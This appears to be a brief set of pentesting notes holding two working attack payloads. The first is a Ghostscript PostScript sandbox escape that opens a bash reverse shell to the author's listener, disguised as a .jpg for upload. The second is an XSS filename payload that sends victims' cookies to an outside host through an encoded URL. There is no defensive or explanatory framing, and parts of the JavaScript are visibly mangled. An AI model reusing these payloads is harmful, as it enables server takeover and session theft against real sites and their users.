%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/███/8080 0>&1') currentdevice putdeviceprops


-----------------------------------------------------------------

█████ is the IP of my listener)

---------save it as test.jpg format to upload it-----------------

if you uploaded the file check using the curl command
-----------------------------------------------------------------------------------------------------------------------

XSS on file upload

 \"><img src=1 onerror=\"url=String104,116,116,112,115,58,47,47,103,97,116,111,108,111,117,99,111,46,48,48,48,119,101,98,104,111,115,116,97,112,112,46,99,111,109,47,99,115,109,111,110,101,121,47,105,110,100,101,120,46,112,104,112,63,116,111,107,101,110,115,61+encodeURIComponent(document['cookie']);xhttp=&#x20new&#x20XMLHttpRequest();xhttp'GET',url,true;xhttp'send';

place this in the uploading file filename 

---------------------------------------------------------------------------------------------------------------------------
